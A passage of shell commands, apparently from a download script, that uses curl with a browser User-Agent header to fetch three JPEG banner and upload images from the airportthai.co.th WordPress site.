  'https://www.airportthai.co.th/wp-content/uploads/2021/02/001.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/2022/06/BanerAPPF30.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://www.airportthai.co.th/wp-content/uploads/2022/09/APFF30-1-scaled.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

